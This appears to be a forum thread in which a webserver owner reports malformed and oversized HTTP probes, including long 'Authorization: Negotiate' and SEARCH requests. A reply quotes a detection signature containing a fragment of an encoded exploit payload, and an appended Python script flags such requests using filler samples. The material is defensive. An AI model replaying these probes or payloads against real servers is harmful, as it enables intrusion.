#1
I've got some people who are trying to attack my webserver, which is not Apache. But I would guess they think it is, or perhaps they think it is M$. What they do is one of two things: either they will send an HTTP request that is far too short, or one that is far too long. An example of the long kind:

GET / HTTP/1.0
Authorization: Negotiate ....

and it goes on from there, beyond the maximum number of bytes that is allowed. Of course, this has no effect, because it's a well written server. But I suppose that if someone were to decode that string, they might find some runnable code in there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH /. ....etc.

YF
yarmfelder@yahoo.com
#2
Hope this is of help:

http://translate.google.com/translat...D%26safe%3Doff

2005/06/04 Attempt of cash server C -> S TCP 80 or 8080 ? " HTTP/1 " and " Authorization: Negotiate " and " YIIQegYGKwYBBQUCoIIQbjC$$C$$EGqhghBmI4IQYgcOcbaeaq ufbqufbquf "

http://216.239.59.104/search?q=cache...hl=en&start=10

<(E-Mail Removed)> wrote in message news:(E-Mail Removed) oups.com...

I've got some people who are trying to attack my webserver, which is not Apache. But I would guess they think it is, or perhaps they think it is M$. What they do is one of two things: either they will send an HTTP request that is far too short, or one that is far too long. An example of the long kind:

GET / HTTP/1.0
Authorization: Negotiate ....

and it goes on from there, beyond the maximum number of bytes that is allowed. Of course, this has no effect, because it's a well written server. But I suppose that if someone were to decode that string, they might find some runnable code in there.

Another long one follows. Notice it is neither GET nor POST.

SEARCH /. ....etc.

YF
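The request shapes described in this thread (a request that is far too short, an oversized `Authorization: Negotiate` header, and a long `SEARCH` request whose target is full of non-printable bytes) can be triaged with a few size and method checks. The following is an added example, not code from either poster; the limits, the method allowlist and the sample requests are assumptions constructed for illustration.

```python
# Added illustration: limits and allowlist are assumed values, not any server's defaults.
MAX_REQUEST_LINE = 2048
MAX_HEADER_VALUE = 1024
MIN_REQUEST_LINE = len(b"GET / HTTP/1.0")
ALLOWED_METHODS = {b"GET", b"HEAD", b"POST"}

def classify(raw: bytes) -> list:
    """Return the reasons a raw request head looks like a probe; empty means clean."""
    reasons = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line = lines[0]
    if len(request_line) < MIN_REQUEST_LINE:
        reasons.append("request-line-too-short")
    if len(request_line) > MAX_REQUEST_LINE:
        reasons.append("request-line-too-long")
    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/1."):
        reasons.append("malformed-request-line")
    else:
        method, target, _version = parts
        if method not in ALLOWED_METHODS:
            reasons.append("method-not-allowed")
        # Request targets should be printable ASCII; raw control or high bytes are suspect.
        if any(b < 0x21 or b > 0x7E for b in target):
            reasons.append("non-printable-target")
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if len(value) > MAX_HEADER_VALUE:
            reasons.append("oversized-header:" + name.decode("ascii", "replace").lower())
    return reasons

# Constructed samples: filler bytes only, no real payload from the thread.
SAMPLES = {
    "clean": b"GET / HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "short": b"GET\r\n\r\n",
    "negotiate": b"GET / HTTP/1.0\r\nAuthorization: Negotiate " + b"A" * 4000 + b"\r\n\r\n",
    "search": b"SEARCH /" + b"\x02\xb1" * 2000 + b" HTTP/1.1\r\n\r\n",
}

def scan(samples: dict) -> dict:
    """Classify every sample and return {name: reasons}."""
    return {name: classify(raw) for name, raw in samples.items()}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, reasons or "ok")
```

In a live server the same limits belong in the read loop, so the connection is dropped once a line exceeds its cap instead of after the whole request has been buffered.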